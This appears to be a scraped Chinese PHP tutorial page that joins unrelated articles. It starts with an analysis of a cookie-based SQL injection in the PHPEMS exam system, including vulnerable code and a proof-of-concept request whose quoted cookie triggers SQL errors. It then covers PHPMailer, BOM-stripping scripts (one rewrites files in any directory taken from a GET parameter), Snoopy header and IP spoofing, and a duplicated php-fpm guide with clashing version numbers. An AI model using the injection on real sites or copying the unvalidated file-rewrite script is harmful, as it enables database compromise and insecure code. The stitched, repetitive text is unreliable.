phpems SQL注入(cookies)分析研究

PHPEMS（PHP Exam Management System）在线模拟考试系统基于PHP+Mysql开发，主要用于搭建模拟考试平台，支持多种题型和展现方式，是国内首款支持题冒题和自动评分与教师评分相结合的PHP开源在线模拟考试系统

使用本系统，您可以快速搭建用于模拟考试的网站平台，实现无纸化考试、真实考场模拟、知识强化练习等功能。可满足培训机构、学校、公司等机构各种考试需求。

代码如下

复制代码

public function __construct(&$G)     {         $this->G = $G;         if (ini_get('magic_quotes_gpc')) {             $get    = $this->stripSlashes($_REQUEST);             $post   = $this->stripSlashes($_POST);             $this->cookie = $this->stripSlashes($_COOKIE);         } else {             $get    = $_REQUEST;             $post   = $_POST;             $this->cookie = $_COOKIE;         }         $this->file = $_FILES;         $this->get = $this->initData($get);         $this->post = $this->initData($post);         $this->url = $this->parseUrl();     } ..........     //获取cookie     public function getCookie($par,$nohead = 0)     {         if(isset($this->cookie[CH.$par]))return $this->cookie[CH.$par];         elseif(isset($this->cookie[$par]) && $nohead)return $this->cookie[$par];         else return false;     }

如果用户开启了GPC，程序员还特意使用stripSlashes()给关掉。

代码如下

复制代码

public function getSessionId() {     $sessionid = $this->ev->getCookie('psid');     if(!$sessionid)     {         if($this->ev->getCookie('PHPSESSID',1))         {             $this->ev->setCookie('psid',$this->ev->getCookie('PHPSESSID',1),3600*24);             $sessionid = $this->ev->getCookie('PHPSESSID',1);         }         else         {             $sid = md5($this->ev->getClientIp().'/'.$_SERVER['HTTP_X_FORWARDED_FOR'].'/'.$_SERVER['REMOTE_ADDR'].':'.$_SERVER['REMOTE_PORT'].':'.$_SERVER['HTTP_USER_AGENT'].':'.date('Y-m-d'));             $this->ev->setCookie('psid',$sid,3600*24);             $sessionid = $sid;         }         $data = array('session',array('sessionid'=>$sessionid,'sessionuserid'=>0,'sessionip'=>$this->ev->getClientIp()));         $sql = $this->sql->makeReplace($data);         $this->db->exec($sql);     }     $this->sessionid = $sessionid;     return $this->sessionid; } 获得psid参数并起保存在$sessionid里 //修改考试会话内容 //参数：会话内容数组 //返回值：true public function modifyExamSession($args) {     $sessionid = $this->session->getSessionId();     $data = array('examsession',$args,"examsessionid = '{$sessionid}'");     $sql = $this->sql->makeUpdate($data);     $this->db->exec($sql);     return true; }

任意找了一个进入数据库的地方。
从上面过程看到，没有做任何过滤就进入数据库了。
Request:
POST /index.php?exam-app-basics-openit HTTP/1.1
Host: phpems.0day5.com
Proxy-Connection: keep-alive
Content-Length: 79
Origin: http://phpems.0day5.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://phpems.0day5.com/index.php?exam-app-basics-detail&basicid=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: exam_psid=c6f1b7acd452e6d72a3ede0f501a9211'; exam_currentuser=%25B4%2585%258B%2585%25CE%25BE%258D%257C%2586%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25C8%25BE%25B8%25BD%25BC%25AFu%2586%25C6%2585%2585%2585u%2581%258Bm%258E%25BE%258D%257C%2588%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25C3%25AC%25C6%25BE%25CA%25BA%25C5%25AFu%2586%25C6%2585%2586%257D%258Dm%258C%2581%25B8%2582%258C%257D%2584%2583%258C%2581%2588%25B0%25B5%2582%2585%25AE%258C%257D%25B4%2580%2587%2584%25B7%25AF%2588%25AC%2586%257E%2583%257C%2584%257Du%2586%25C6%2585%258C%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25BC%25BBu%2586%25C6%2585%258C%2585u%257C%2585%2582%2581%257B%2581%257B%2581%257Cu%2586%25C6%2585%2584%257F%258Dm%25C6%25B0%25C6%25BE%25BC%25BA%25C1%25B2%25C5%25BA%25C8%25BB%25BC%25AFu%2586%25C6%2585%2584%2585u%2583u%2586%25C6%2585%2584%2581%258Dm%25C6%25B0%25C6%25BE%25BC%25BA%25C1%25B7%25C2%25B2%25BC%25B9%25C7%25B4%25C0%25B0u%2586%25BC%2585%2584%257E%258B%2584%2588%257C%2589%2582%258B%257E%258E%25BE%258D%257C%2588%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25C8%25BE%25B8%25BD%25C1%25AC%25C0%25B0u%2586%25C6%2585%2589%2585u%257C%2584%257C%2584%257C%2584m%258E%25BE%258D%257C%2589%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25C7%25B4%25C0%25B0%25BF%25B4%25C0%25B4%25C7m%258E%25B4%258D%257C%2586%2583%258C%2580%2584%2581%258A%2583%2586%2586%25C6%2585%258C%2585u%25BE%25B8%25BE%25C6%25B4%25C2%25B9%25BC%25AFu%2586%25C6%2585%2586%257D%258Dm%25B6%2581%25B9%257C%25B5%2582%25B4%25AE%25B7%257F%2588%257D%25B8%2581%25B7%2582%2585%25AC%2586%25B0%25B7%25B0%2583%25B1%2588%257B%2584%25AC%258C%257D%2584%257Cu%2586%25D0; CNZZDATA5243664=cnzz_eid%3D2105242747-1389515449-%26ntime%3D1389515449%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1389515448225

Response:
HTTP/1.1 200 OK
Date: Sun, 12 Jan 2014 09:32:14 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
P3P: CP=CAO PSA OUR
Content-Length: 606
Content-Type: text/html; charset=utf-8

ERRO:SELECT * FROM x2_session AS session WHERE sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'' LIMIT 0,100:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211'' LIMIT 0,100' at line 1ERRO:UPDATE x2_session AS session SET `sessionlasttime` = '1389519134' WHERE sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211''' at line 1
漏洞证明。

在php中我们在linux服务器安装了邮件组件可以直接使用mail函数发送邮箱，对于windows系统我们多半使用PHPMailer实现邮件发送了，下面来看一个简单的例子。

使用PHPMailer类实现邮件的发送。

代码如下

复制代码

$phpmailer = new PHPMailer(); $phpmailer->IsSMTP();  // 用smtp协议来发   $phpmailer->Host = 'smtp.163.com'; $phpmailer->SMTPAuth = true; $phpmailer->Username = '******'; //163邮箱帐号 @163前面的那个 $phpmailer->Password = '******'; //密码   // 可以发信了   $phpmailer->From = '*****@163.com';   //邮箱地址 $phpmailer->FromName = 'yanjiadong'; $phpmailer->Subject = '欢迎你注册,你的激活邮件'; $phpmailer->Body = '请点击进行激活';   // 添加收件人 $phpmailer->AddAddress('********@qq.com','用户名');   // 发信   echo $phpmailer->send()?'ok':'fail';

注意phpmailer组件下载可以百度搜索一下。

因为文件头信息输出BOM头信息，有时会对程序的执行结果造成影响，那么此时即应对这些文件的BOM信息进行去除。

如下代码为PHP方式去除当前目录及子目录所有文件BOM信息的代码，新建文件，将其放倒根目录下，然后浏览器访问即可。

例子

将以上代码保存为后缀为php的文件放到需要去除bom的文件目录里面，然后运行该php文件，将会对该目录以及该目录所有的子目录下的文件进行bom检查并去除bom

代码如下

复制代码

<?php if (isset($_GET['dir'])) { //设置文件目录      $basedir = $_GET['dir']; } else {     $basedir = '.'; } $auto = 1; checkdir($basedir); function checkdir($basedir) {     if ($dh = opendir($basedir)) {         while (($file = readdir($dh)) !== false) {             if ($file != '.' && $file != '..') {                 if (!is_dir($basedir . "/" . $file)) {                     echo "filename: $basedir/$file " . checkBOM("$basedir/$file") . " <br>";                 } else {                     $dirname = $basedir . "/" . $file;                     checkdir($dirname);                 }             }         }         closedir($dh);     } } function checkBOM($filename) {     global $auto;     $contents   = file_get_contents($filename);     $charset[1] = substr($contents, 0, 1);     $charset[2] = substr($contents, 1, 1);     $charset[3] = substr($contents, 2, 1);     if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {         if ($auto == 1) {             $rest = substr($contents, 3);             rewrite($filename, $rest);             return ("<font color="red">BOM found, automatically removed._<a href="http://www.111cn.net">http://www.111cn.net</a></font>");         } else {             return ("<font color="red">BOM found.</font>");         }     } else         return ("BOM Not Found."); } function rewrite($filename, $data) {     $filenum = fopen($filename, "w");     flock($filenum, LOCK_EX);     fwrite($filenum, $data);     fclose($filenum); } ?>

例子二

代码如下

复制代码

<?php header('content-Type: text/html; charset=utf-8'); $auto=1;/*设置为1标示检测BOM并去除，设置为0标示只进行BOM检测，不去除*/ $basedir='.'; $loop=true;//www.111cn.net echo '当前查找的目录为：'.$basedir.'当前的设置是：'; echo '（1）',$loop?'检查当前目录以及当前目录的子目录':'只针对当前目录进行检测'; echo '（2）',$auto?'检测文件BOM同时去除检测到BOM文件的BOM<br />':'只检测文件BOM不执行去除BOM操作<br />'; checkdir($basedir,$loop); function checkdir($basedir='',$loop=true){  $basedir=empty($basedir)?'.':$basedir;  if($dh=opendir($basedir)){   while (($file=readdir($dh))!==false){    if($file!='.'&&$file!='..'){     if(!is_dir($basedir.'/'.$file)){      echo '文件: '.$basedir.'/'.$file .checkBOM($basedir.'/'.$file).' <br>';     }else{      if(!$loop) continue;      $dirname=$basedir.'/'.$file;      checkdir($dirname);     }    }   }   closedir($dh);  } } function checkBOM($filename){  global $auto;  $contents=file_get_contents($filename);  $charset[1]=substr($contents,0,1);  $charset[2]=substr($contents,1,1);  $charset[3]=substr($contents,2,1);  if(ord($charset[1])==239&&ord($charset[2])==187&&ord($charset[3])==191){   if($auto==1){    $rest=substr($contents,3);    rewrite($filename,$rest);    return (' <font color=red>找到BOM并已自动去除</font>');   }else{    return (' <font color=red>找到BOM</font>');   }  }else{   return (' 没有找到BOM');  } } function rewrite($filename,$data){  $filenum=fopen($filename,'w');  flock($filenum,LOCK_EX);  fwrite($filenum,$data);  fclose($filenum); }

Snoopy是一个用来模拟浏览器的一些简单功能的php类，可以获取网页内容，发送表单等操作。Snoopy正确运行需要你的服务器的PHP版本在4以上，并且支持PCRE（Perl Compatible Regular Expressions），基本的LAMP服务都支持。由于它本身是php一个类，无需扩支持，因此在服务器不支持curl的时候是最好的选择

Snoopy的特点：

1、抓取网页的内容 fetch

2、抓取网页的文本内容 (去除HTML标签) fetchtext

3、抓取网页的链接，表单 fetchlinks fetchform

4、支持代理主机

5、支持基本的用户名/密码验证

6、支持设置 user_agent, referer(来路), cookies 和 header content(头文件)

7、支持浏览器重定向，并能控制重定向深度

8、能把网页中的链接扩展成高质量的url(默认)

9、提交数据并且获取返回值

10、支持跟踪HTML框架

11、支持重定向的时候传递cookies

Snoopy类的下载地址：http://sourceforge.net/projects/snoopy/

Snoopy类方法:

fetch($URI)

这是为了抓取网页的内容而使用的方法。$URI参数是被抓取网页的URL地址。抓取的结果被存储在 $this->results 中。如果你正在抓取的是一个框架，Snoopy将会将每个框架追踪后存入数组中，然后存入 $this->results。

fetchtext($URI)

本方法类似于fetch()，唯一不同的就是本方法会去除HTML标签和其他的无关数据，只返回网页中的文字内容。

fetchform($URI)

本方法类似于fetch()，唯一不同的就是本方法会去除HTML标签和其他的无关数据，只返回网页中表单内容(form)。

fetchlinks($URI)

本方法类似于fetch()，唯一不同的就是本方法会去除HTML标签和其他的无关数据，只返回网页中链接(link)。默认情况下，相对链接将自动补全，转换成完整的URL。

submit($URI,$formvars)

本方法向$URL指定的链接地址发送确认表单。$formvars是一个存储表单参数的数组。

submittext($URI,$formvars)

本方法类似于submit()，唯一不同的就是本方法会去除HTML标签和其他的无关数据，只返回登陆后网页中的文字内容。

submitlinks($URI)

本方法类似于submit()，唯一不同的就是本方法会去除HTML标签和其他的无关数据，只返回网页中链接(link)。 默认情况下，相对链接将自动补全，转换成完整的URL。

Snoopy类属性: (缺省值在括号里)

$host 连接的主机
$port 连接的端口
$proxy_host 使用的代理主机，如果有的话
$proxy_port 使用的代理主机端口，如果有的话
$agent 用户代理伪装 (Snoopy v0.1)
$referer 来路信息，如果有的话
$cookies cookies， 如果有的话
$rawheaders 其他的头信息, 如果有的话
$maxredirs 最大重定向次数， 0=不允许 (5)
$offsiteok whether or not to allow redirects off-site. (true)
$expandlinks 是否将链接都补全为完整地址 (true)
$user 认证用户名, 如果有的话
$pass 认证用户名, 如果有的话
$accept http 接受类型 (image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*)
$error 哪里报错, 如果有的话
$response_code 从服务器返回的响应代码
$headers 从服务器返回的头信息
$maxlength 最长返回数据长度
$read_timeout 读取操作超时 (requires PHP 4 Beta 4+)
设置为0为没有超时
$timed_out 如果一次读取操作超时了，本属性返回 true (requires PHP 4 Beta 4+)
$maxframes 允许追踪的框架最大数量
$status 抓取的http的状态
$temp_dir 网页服务器能够写入的临时文件目录 (/tmp)
$curl_path cURL binary 的目录, 如果没有cURL binary就设置为 false

Snoopy使用示例：

（1）获取指定url内容

代码如下	复制代码
$url='http://www.111cn.net'; include('snoopy.php'); $snoopy=new Snoopy; $snoopy->fetch($url);//获取所有内容 echo $snoopy->results;//显示结果 $snoopy->fetchtext //获取文本内容（去掉html代码） $snoopy->fetchlinks //获取页面所有链接 $snoopy->fetchform //获取页面表单信息

（2）提交表单

代码如下	复制代码
include 'snoopy.php'; $snoopy=new Snoopy; $formvars['username']='admin'; $formvars['pwd']='admin'; $action='http://www.111cn.net';//表单提交地址 $snoopy->submit($action,$formvars);//$formvars为提交的数组 echo $snoopy->results;//获取表单提交后的 返回的结果 $snoopy->submittext;//提交后只返回去除html的文本 $snoopy->submitlinks;//提交后只返回链接

（3）使用Snoopy来伪装

代码如下

复制代码

$formvars['username']='admin'; $formvars['pwd']='admin'; $action='http://www.111cn.net'; include 'snoopy.php'; $snoopy=new Snoopy; $snoopy->cookies['PHPSESSID']='fc206b1918bd522cc863p36890e6notef7';//伪装sessionid $snoopy->agent='(compatible;MSIE 4.01;MSN 2.5;AOL 4.0;Windows 98)';//伪装浏览器 $snoopy->referer='http://www.111cn.net';//伪装来源页地址 http_referer $snoopy->rawheaders['Pragma']='no-cache';//cache 的http头信息 $snoopy->rawheaders['X_FORWARDED_FOR']='127.0.0.1';//伪装ip $snoopy->submit($action,$formvars); echo $snoopy->results;

目前最新5.3.x的php-fpm，有两种管理进程的方式，分别是static和dynamic,如果设置成static，进程数自始至终都是pm.max_children指定的数量，pm.start_servers，pm.min_spare_servers，pm.max_spare_servers配置将没有作用。

 
如果设置成dynamic，则进程数是动态的，最开始是pm.start_servers指定的数量，如果请求较多，则会自动增加，但不超过pm.max_children指定的数量，同时保证空闲的进程数不小于pm.min_spare_servers，如果进程数较多，也会进行相应清理，保证多余的进程数不多于pm.max_spare_servers。
 
当php-fpm启动后，一个php-cgi进程约战3M内存，但是当它们处理过一些请求后，有些内存是释放不掉的，占用的内存能达到20M-30M不等。
 
对于内存比较吃紧，同时并发量不是很大的应用，可以考虑采用static的方式，这样可以很好的控制php-fpm的所消耗的总内存数，让系统更加平稳运行。另外由于并发量很小，可以适当的把设置pm.max_requests小一些，以便让php-fpm进程有机会重启，从而释放其占用的内存。

 使用PHP-FPM来控制PHP-CGI的FastCGI进程

/usr/local/php/sbin/php-fpm{start|stop|quit|restart|reload|logrotate}

　　--start 启动php的fastcgi进程

　　--stop 强制终止php的fastcgi进程

　　--quit 平滑终止php的fastcgi进程

　　--restart 重启php的fastcgi进程

　　--reload 重新平滑加载php的php.ini

　　--logrotate 重新启用log文件

php-fpm目前主要又两个分支，分别对应于php-5.3.3以前的版本和php-5.3.3以后的版本。在5.2.x的版本中，php-fpm.conf使用的是xml格式，而在新的5.3.3以后的版本中，则是php.ini一样的配置风格。对于5.5.3以后的版本中存在两种php-fpm进程的管理方式——static和dynamic。具体/usr/local/php/conf/php-fpm.conf.default中的配置如下：

; Choose how the process manager will control the number of child processes.
; Possible Values:
;   static  - a fixed number (pm.max_children) of child processes;
;   dynamic - the number of child processes are set dynamically based on the
;             following directives. With this process management, there will be
;             always at least 1 children.
;             pm.max_children      - the maximum number of children that can
;                                    be alive at the same time.
;             pm.start_servers     - the number of children created on startup.
;             pm.min_spare_servers - the minimum number of children in 'idle'
;                                    state (waiting to process). If the number
;                                    of 'idle' processes is less than this
;                                    number then some children will be created.
;             pm.max_spare_servers - the maximum number of children in 'idle'
;                                    state (waiting to process). If the number
;                                    of 'idle' processes is greater than this
;                                    number then some children will be killed.
;  ondemand - no children are created at startup. Children will be forked when
;             new requests will connect. The following parameter are used:
;             pm.max_children           - the maximum number of children that
;                                         can be alive at the same time.
;             pm.process_idle_timeout   - The number of seconds after which
;                                         an idle process will be killed.
; Note: This value is mandatory.
pm = dynamic

      从上面可以看到默认是启用的动态管理方式。而php-fpm进程数是动态的，最开始是pm.start_servers指定的数量，如果请求较多，则会自动增加，保证空闲的进程数不小于pm.min_spare_servers，如果进程数较多，也会进行相应清理，保证多余的进程数不多于pm.max_spare_servers。在上面的配置文件中也可以看到其中涉及到四个参数的设置，其作用分别如下：
pm.max_children：静态方式下开启的php-fpm进程数量。
pm.start_servers：动态方式下的起始php-fpm进程数量。
pm.min_spare_servers：动态方式下的最小php-fpm进程数量。
pm.max_spare_servers：动态方式下的最大php-fpm进程数量。

如果dm设置为static，那么其实只有pm.max_children这个参数生效。系统会开启设置数量的php-fpm进程。
如果dm设置为dynamic，那么pm.max_children参数失效，后面3个参数生效。系统会在php-fpm运行开始的时候启动pm.start_servers个php-fpm进程，然后根据系统的需求动态在pm.min_spare_servers和pm.max_spare_servers之间调整php-fpm进程数。

那么，对于我们的服务器，选择哪种执行方式比较好呢？事实上，跟Apache一样，运行的PHP程序在执行完成后，或多或少会有内存泄露的问题。这也是为什么开始的时候一个php-fpm进程只占用3M左右内存，运行一段时间后就会上升到20-30M的原因了。

对于内存大的服务器（比如8G以上）来说，指定静态的max_children实际上更为妥当，因为这样不需要进行额外的进程数目控制，会提高效率。因为频繁开关php-fpm进程也会有时滞，所以内存够大的情况下开静态效果会更好。比如8GB内存可以设置为100，那么php-fpm耗费的内存就能控制在 2G-3G的样子。，如果数据库和web应用在不同的服务器上，该机器只跑web应用，大可开到300左右。如果内存稍微小点，比如1G那么指定静态的进程数量更加有利于服务器的稳定。这样可以保证php-fpm只获取够用的内存，将不多的内存分配给其他应用去使用，会使系统的运行更加畅通。

对于小内存的服务器来说，比如256M内存的VPS，即使按照一个20M的内存量来算，10个php-cgi进程就将耗掉200M内存，那系统的崩溃就应该很正常了。因此应该尽量地控制php-fpm进程的数量，大体明确其他应用占用的内存后，给它指定一个静态的小数量，会让系统更加平稳一些。或者使用动态方式，因为动态方式会结束掉多余的进程，可以回收释放一些内存，所以推荐在内存较少的服务器或VPS上使用。比如说512M的VPS，建议pm.max_spare_servers设置为20。至于pm.min_spare_servers，则建议根据服务器的负载情况来设置，比较合适的值在5~10之间。

这两种不同的进程管理方式，可以根据服务器的实际需求来进行调整。

这里先说一下涉及到这个的几个参数，他们分别是pm、pm.max_children、pm.start_servers、pm.min_spare_servers和pm.max_spare_servers。

pm表示使用那种方式，有两个值可以选择，就是static（静态）或者dynamic（动态）。在更老一些的版本中，dynamic被称作apache-like。这个要注意看配置文件的说明。

下面4个参数的意思分别为：

    pm.max_children：静态方式下开启的php-fpm进程数量。
    pm.start_servers：动态方式下的起始php-fpm进程数量。
    pm.min_spare_servers：动态方式下的最小php-fpm进程数量。
    pm.max_spare_servers：动态方式下的最大php-fpm进程数量。

如果dm设置为static，那么其实只有pm.max_children这个参数生效。系统会开启设置数量的php-fpm进程。

如果dm设置为dynamic，那么pm.max_children参数失效，后面3个参数生效。系统会在php-fpm运行开始的时候启动pm.start_servers个php-fpm进程，然后根据系统的需求动态在pm.min_spare_servers和pm.max_spare_servers之间调整php-fpm进程数。

那么，对于我们的服务器，选择哪种执行方式比较好呢？事实上，跟Apache一样，运行的PHP程序在执行完成后，或多或少会有内存泄露的问题。这也是为什么开始的时候一个php-fpm进程只占用3M左右内存，运行一段时间后就会上升到20-30M的原因了。

对于内存大的服务器（比如8G以上）来说，指定静态的max_children实际上更为妥当，因为这样不需要进行额外的进程数目控制，会提高效率。因为频繁开关php-fpm进程也会有时滞，所以内存够大的情况下开静态效果会更好。数量也可以根据 内存/30M 得到，比如8GB内存可以设置为100，那么php-fpm耗费的内存就能控制在 2G-3G的样子。如果内存稍微小点，比如1G，那么指定静态的进程数量更加有利于服务器的稳定。这样可以保证php-fpm只获取够用的内存，将不多的内存分配给其他应用去使用，会使系统的运行更加畅通。

对于小内存的服务器来说，比如256M内存的VPS，即使按照一个20M的内存量来算，10个php-cgi进程就将耗掉200M内存，那系统的崩溃就应该很正常了。因此应该尽量地控制php-fpm进程的数量，大体明确其他应用占用的内存后，给它指定一个静态的小数量，会让系统更加平稳一些。或者使用动态方式，因为动态方式会结束掉多余的进程，可以回收释放一些内存，所以推荐在内存较少的服务器或VPS上使用。具体最大数量根据 内存/20M 得到。比如说512M的VPS，建议pm.max_spare_servers设置为20。至于pm.min_spare_servers，则建议根据服务器的负载情况来设置，比较合适的值在5~10之间。